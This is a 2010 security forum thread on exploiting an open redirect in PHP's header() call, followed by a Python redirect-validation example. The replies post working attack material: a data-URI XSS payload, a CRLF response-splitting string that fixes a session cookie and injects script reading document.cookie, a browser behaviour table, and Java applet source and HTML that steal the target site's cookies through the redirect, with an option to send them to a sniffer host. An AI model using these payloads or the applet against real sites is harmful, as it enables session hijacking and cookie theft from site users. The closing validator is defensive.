PHP header location (open redirect)
Posted by: PaPPy
Date: August 18, 2010 08:40PM

this isn't really xss, or code injection, so i wasn't sure where to put it.

my question is i have an open redirect

header("Location: $_GET[url]");

other than using it for phishing, what can i use it for?
are there ways to set other header info? xss? (there is no xss on the site, i would know, i used to code for them)

Re: PHP header location (open redirect)
Posted by: p0deje
Date: August 19, 2010 02:24AM

you can use the data URI scheme as an attack vector
e.g. ?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

works in FF3.6

---------
http://p0deje.blogspot.com

Re: PHP header location (open redirect)
Posted by: PaPPy
Date: August 19, 2010 07:03AM

just 3.6? or the whole suite?
tried with 3.6.8 and it just redirected me to a black page of
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

http://www.xssed.com/archive/author=PaPPy/

Re: PHP header location (open redirect)
Posted by: Reiners
Date: August 19, 2010 07:43AM

you can set cookies for session fixation attacks or you can inject a second response page with javascript (only worked in FF for me back in the day):

%0d%0aSet-Cookie:%20PHPSESSID=fixated%0d%0aContent-Type:%20text/html
%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E

search for "http response splitting".
these attacks only work for header() in PHP 4 < 4.4.2 and PHP 5 < 5.1.2. In later versions this function has been patched against CRLF injection and will throw a "Header may not contain more than a single header, new line detected." error.

Re: PHP header location (open redirect)
Posted by: Anonymous User
Date: August 19, 2010 04:30PM

Browser  | javascript:alert(document.domain) | data:,<script>alert(document.domain)</script>
FF 3.6.x | X                                 | OK (about:blank)
IE8      | X                                 | X
Chrome 7 | X                                 | X
Safari 5 | X                                 | OK (about:blank)
Opera 10 | X                                 | OK (about:blank)

Behavior changes depending on status message - but nothing really significant. FF and Opera execute the JS with 300,301,302,303,307 - Safari 5 prefers 301,302,303,305,306,307. Hope that helped.



Edited 2 time(s). Last edit at 08/19/2010 04:41PM by .mario.

Re: PHP header location (open redirect)
Posted by: p0deje
Date: August 20, 2010 02:51AM

for Firefox 3.6.8 it executes from time to time (cannot necessary behavior)
same exploit works always in Opera 10.61
doesn't work for Chrome 6 (requires page reload)

---------
http://p0deje.blogspot.com

Re: PHP header location (open redirect)
Posted by: LeverOne
Date: August 20, 2010 01:50PM

Getting the cookies using a server-side redirect and JAVA. (without JavaScript)
FIXED in JAVA 1.6.0_22 21 Oct 2010.

* Time to use my "pocket" vulnerability.
* This method works in all recent browsers. Last time I tested it on JAVA 1.6.0_21, but long ago I also tested it on JAVA 1.6.0.

1. Download applet http://code.google.com/p/cookieexpropriator/downloads/list

2. Usage.

Suppose we have a server-side redirect on the site http://somesite.com/redirect.php?url=blabla
We want to get a cookie from http://somesite.com/

Also suppose the site where we can control the markup and upload files is http://yoursite.com

http://yoursite.com/test.html

<html>
<body>

<applet code=CExpr.class archive=redirect.php?url=http://yoursite.com/CExpr.jar  codebase=http://somesite.com/ width=1 height=1 mayscript=true>
<param name=from value=http://somesite.com>
<param name=method value=get>
<!--    to send cookies to sniffer
<param name=s value=http://mysniffer.com/s.gif>
-->
<!-- to display the result on the console -->
<param name=output>
</applet>

</body>
</html>

* CExpr.jar - This is CExpr.class in zip-archive (just rename the "zip" to "jar").

* In the java console the following can be seen:

cookie: Request[ Host: somesite.com User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_21 Cookie: bla=bla; bla1=bla1 ]; exceptmessage:

Thus, if we have a server-side redirection, we have cookies. Right now.


==============

Simple demo applet (needs javascript to display the result)

*This applet can be used to test the vulnerability in pure form.

CExpr.java
import java.applet.*;
import java.net.*;
import java.io.*;

public class CExpr extends Applet
{
 public void start()
 {
  try {
       // target origin; should return 200 OK preferably
       URL url = new URL("http://somesite.com");
       HttpURLConnection conn = (HttpURLConnection) url.openConnection();
       try {
            conn.getInputStream();    // method GET; the plugin attaches the cookies it holds for this origin
           }
       catch (IOException ee)
           {
            conn.getErrorStream();    // a non-2xx status still completes the request
           }
       // read back the Cookie header the plugin added to the request
       String cookie = conn.getRequestProperty("Cookie");
       getAppletContext().showDocument(new URL("javascript:alert('"+cookie+"');"));
      }
  catch (Exception e){}
 }
}

<applet code=CExpr.class archive=redirect.php?url=http://yoursite.com/CExpr.jar codebase=http://somesite.com/ ></applet>

DEMO

http://olo-olo-lo.narod.ru/test.html

LeverOne

----------------------
~Veritas~



Edited 8 time(s). Last edit at 02/14/2011 10:51AM by LeverOne.

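As an added example (not code from the thread or from any of its posters), here is the check a site running header("Location: $_GET[url]") would apply before redirecting, written in Python; it rejects the CRLF response-splitting payload, the data:/javascript: targets and the off-site target (such as the redirected applet jar) discussed in the posts above. ALLOWED_HOSTS, FALLBACK and the sample URLs are assumptions.

```python
# Added example, not code from the thread: a redirect-target check for a
# PHP-style header("Location: $_GET[url]") endpoint, written in Python.
# ALLOWED_HOSTS, FALLBACK and the sample URLs are assumptions for the demo.
from urllib.parse import unquote, urlsplit, urlunsplit

ALLOWED_HOSTS = {"somesite.com", "www.somesite.com"}  # assumed allow-list
FALLBACK = "/"  # where to send the user when the value is rejected


def safe_redirect_target(raw, allowed_hosts=ALLOWED_HOSTS):
    """Return a value safe to put in a Location header, or FALLBACK.

    `raw` is the query-string value; it is percent-decoded once here,
    as PHP does before filling $_GET, so the thread's encoded payloads
    can be passed in exactly as they appear."""
    if not raw:
        return FALLBACK
    value = unquote(raw)
    # CR, LF or any other control character means response splitting
    # (Set-Cookie / second body injection) or a malformed header.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in value):
        return FALLBACK
    # Some browsers treat "\" like "/", so "/\evil.com" would otherwise
    # parse as a relative path here but as a host in the browser.
    value = value.replace("\\", "/")
    parts = urlsplit(value)
    scheme, netloc = parts.scheme.lower(), parts.netloc.lower()
    if scheme == "" and netloc == "":
        # Site-relative path: one leading slash only, so that the
        # protocol-relative form "//evil.com" is not accepted.
        if value.startswith("/") and not value.startswith("//"):
            return value
        return FALLBACK
    # Only http(s) may leave the site; this rejects data:, javascript:
    # and protocol-relative targets in one check.
    if scheme not in ("http", "https"):
        return FALLBACK
    # Only allow-listed hosts, and no userinfo ("allowed@evil.com").
    if "@" in netloc or (parts.hostname or "") not in allowed_hosts:
        return FALLBACK
    return urlunsplit((scheme, netloc, parts.path or "/", parts.query, ""))
```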
Re: PHP header location (open redirect)
Posted by: Kyo
Date: August 21, 2010 01:13PM

That's pretty damn clever. Love it.
